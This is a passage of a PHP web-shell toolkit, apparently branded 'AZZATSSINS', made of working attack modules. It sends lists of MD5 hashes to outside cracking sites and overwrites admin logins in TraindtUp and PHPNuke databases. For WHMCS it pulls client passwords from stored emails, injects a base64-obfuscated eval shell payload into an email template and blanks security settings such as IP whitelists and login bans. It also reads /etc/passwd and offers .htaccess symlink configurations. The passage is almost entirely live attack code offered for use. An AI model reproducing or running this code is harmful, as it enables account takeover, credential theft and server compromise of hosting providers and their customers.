- $(document).ready(function(){
- $('pre').fadeIn(3000);
- $('input[type="text"]').click(function(){
- $(this).val('');
- });
- });
- </script>
- <?
- if(!empty($_POST['password'])){
- set_time_limit(0);
- $password = nl2br($_POST['password']);
- $ex = explode("<br />",$password);
- $total_checked = 0;
- $total_cracked = 0;
- $total_failed = 0;
- $total_not_md5 = 0;
- foreach($ex as $cracking_password){
- $total_checked++;
- $cracking_passwords = explode("|",$cracking_password);
- $cracking_password = explode("|",$cracking_password);
- $cracking_password = $cracking_password[1];
- echo $cracking_passwords[0]."|";
- $cracking_password = trim($cracking_password);
- $regex = "/[a-z0-9]{32}/i";
- if(preg_match($regex,$cracking_password)){
- $curl_crack = curl_init();
- CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
- CURL_SETOPT($curl_crack,CURLOPT_POST,True);
- CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
- CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
- CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
- curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
- curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
- $exec = curl_exec($curl_crack);
- if(preg_match("/pass : (.*)/",$exec,$cracked)){
- echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
- $total_cracked++;
- flush();
- }else{
- CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
- CURL_SETOPT($curl_crack,CURLOPT_POST,True);
- CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
- CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
- CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
- curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
- curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
- $exec = curl_exec($curl_crack);
- if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
- echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
- $total_cracked++;
- flush();
- }else{
- $curl_crack = curl_init();
- CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
- CURL_SETOPT($curl_crack,CURLOPT_POST,True);
- CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
- CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
- CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
- curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
- curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
- $exec = curl_exec($curl_crack);
- if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
- echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
- $total_cracked++;
- flush();
- }else{
- $curl_crack = curl_init();
- CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
- CURL_SETOPT($curl_crack,CURLOPT_POST,True);
- CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
- CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
- CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
- curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
- curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
- $exec = curl_exec($curl_crack);
- if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
- echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
- $total_cracked++;
- flush();
- }else{
- echo "<font size='2' color='red'><b>Not Found</b></font><br />";
- $total_failed++;
- flush();
- }// Next update put the fifth website here
- }
- }
- }
- }
- else{
- $total_not_md5++;
- echo $cracking_password."<br />";
- flush();
- continue;
- }
- //close curl //curl_close($curl_crack);
- }
- echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
- }else{
- ?>
- <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- <center>
- <form method="POST">
- </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
- <br><br>
- <input type="submit" name="crack" value="Crack Password">
- <br>
- </form>
- </center>
- <?
- }}
- if($_GET['traindt']=="login"){
- set_time_limit(0);
- echo "<html><head><title>TraindtUpLoginChanger</title></head>";
- echo "<body><center>
- <h2>AZZATSSINS</h2>
- <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
- <form method=POST action=''>
- DB HOST<br/>
- <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
- DB NAME<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
- DB USER<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
- DB PASSWORD<br/>
- <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
- <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
- <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
- NEW ADMIN LOGIN USER<br/>
- <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
- NEW ADMIN LOGIN PASS<br/>
- <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
- <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu3,$anu4);
- @mysql_select_db($anu2);
- $idmaho=str_replace("\'","'",$idmaho);
- $target_id = $_POST['idmaho'];
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
- $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
- $oke=@mysql_query($sodok1);
- $oke=@mysql_query($sodok2);
- if($oke)
- {
- echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- if($_GET['nuke']=="login"){
- set_time_limit(0);
- echo "<html><head><title>PHPNukeLoginChanger</title></head>";
- echo "<body><center>
- <h2>AZZATSSINS</h2>
- <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
- <form method=POST action=''>
- DB HOST<br/>
- <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
- DB NAME<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
- DB USER<br/>
- <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
- DB PASSWORD<br/>
- <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
- <hr style='color:lime;'>
- TARGET PREFIX<br/>
- <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
- NEW ADMIN LOGIN USER<br/>
- <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
- NEW ADMIN LOGIN PASS<br/>
- <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
- <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu3,$anu4);
- @mysql_select_db($anu2);
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $prefix = $_POST['prefix'];
- $table_name1 = $prefix."users" ;
- $table_name2 = $prefix."authors" ;
- $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
- $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
- $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
- $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
- $oke=@mysql_query($okenuke1);
- $oke=@mysql_query($okenuke2);
- $oke=@mysql_query($okenuke3);
- $oke=@mysql_query($okenuke4);
- if($oke)
- {
- echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- if($_GET['ceck']=="whmcs"){
- set_time_limit(0);
- ?>
- <p><br/><body>
- <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
- <br></form></center>
- <?php
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- if(isset($_POST['plapon'])){
- $target = $_POST['url'];
- $bukadikitjoss = fopen("$target/?licensedebug","r");
- $hasil = '';
- while (!feof($bukadikitjoss)) {
- $hasil .= fread($bukadikitjoss, 8192);
- }
- echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
- }
- echo "</table>";
- }
- if($_GET['whmcs']=="client"){
- set_time_limit(0);
- ?>
- <p><br/><body>
- <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br></form></center>
- <?php
- if(isset($_POST['plapon'])) {
- $perawan = $_POST['anu1'];
- $kimcil = $_POST['anu2'];
- $janda = $_POST['anu3'];
- $hotel = $_POST['anu4'];
- function get_string_between($string, $start, $end){
- $string = " ".$string;
- $ini = strpos($string,$start);
- if ($ini == 0) return "";
- $ini += strlen($start);
- $len = strpos($string,$end,$ini) - $ini;
- return substr($string,$ini,$len);
- }
- @mysql_connect($perawan,$kimcil,$janda);
- @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
- $query="select subject,message from tblemails";
- $result=mysql_query($query);
- mysql_close();
- $num=mysql_numrows($result);
- $i=0;
- while ($i < $num) {
- $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
- <th align='center'><b>CLIENT EMAIL</b></th>
- <th align='center'><b>CLIENT PASSWORD</b></th>
- </tr>";
- if(stristr($css,"Welcome")){
- $s =mysql_result($result,$i,"message");
- if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
- $mail= get_string_between($s,"Login Username: ","<br />");
- $m2 = get_string_between($s,"Email Address: ","<br />");
- $pass = get_string_between($s,"Password: ","</p>");
- print $mail.$m2.":".$pass."<br>";
- echo "<tr>
- <td align='center'>$mail.$m2.</td>
- <td align='center'>".$pass."</td>
- </tr>";
- }
- }
- ++$i;
- }
- }
- echo "</table>";
- }
- if($_GET['whmcs']=="shell"){
- set_time_limit(0);
- ?>
- <p><br/><body>
- <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
- name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
- </td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </form>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $shell=str_replace("'","'",$shell);
- $gosok_shell = $_POST['shell'];
- $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
- $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }
- if($_GET['whmcs']=="token"){
- set_time_limit(0);
- ?>
- <p><br/><body>
- <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </FORM>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
- $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
- $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
- $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
- $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
- $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
- $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
- $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
- $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
- $udah_ganteng=@mysql_query($crot1);
- $udah_ganteng=@mysql_query($crot2);
- $udah_ganteng=@mysql_query($crot3);
- $udah_ganteng=@mysql_query($crot4);
- $udah_ganteng=@mysql_query($crot5);
- $udah_ganteng=@mysql_query($crot6);
- $udah_ganteng=@mysql_query($crot7);
- $udah_ganteng=@mysql_query($crot8);
- $udah_ganteng=@mysql_query($crot9);
- $udah_ganteng=@mysql_query($crot10);
- if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }
- if($_GET['whmcs']=="scan"){
- set_time_limit(0);
- echo '<br><br><body bgcolor=black><center>
- <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
- <nobr><span class="b7">O=:[ SCAN CMS</span> <span class="b8">WHMCS ]:=O</nobr></span><br/><br/>
- <form method="POST">
- <center>
- <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
- $uSr=file("/etc/passwd");
- foreach($uSr as $usrr)
- {
- $str=explode(":",$usrr);
- echo $str[0]."\n";
- }
- ?>
- </textarea><p>
- <nobr><font style="color:red;background-color:#000000">
- [~] Home :
- <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
- <option title="home" value="home">home</option>
- <option title="home2" value="home2">home2</option>
- <option title="home3" value="home3">home3</option>
- <option title="home4" value="home4">home4</option>
- <option title="home5" value="home5">home5</option>
- <option title="home6" value="home6">home6</option>
- <option title="home7" value="home7">home7</option>
- <option title="home8" value="home8">home8</option>
- <option title="home9" value="home9">home9</option>
- <option title="home10" value="home10">home10</option>
- </select> [~] Htaccess :
- <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
- <option title="Apache" value="Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
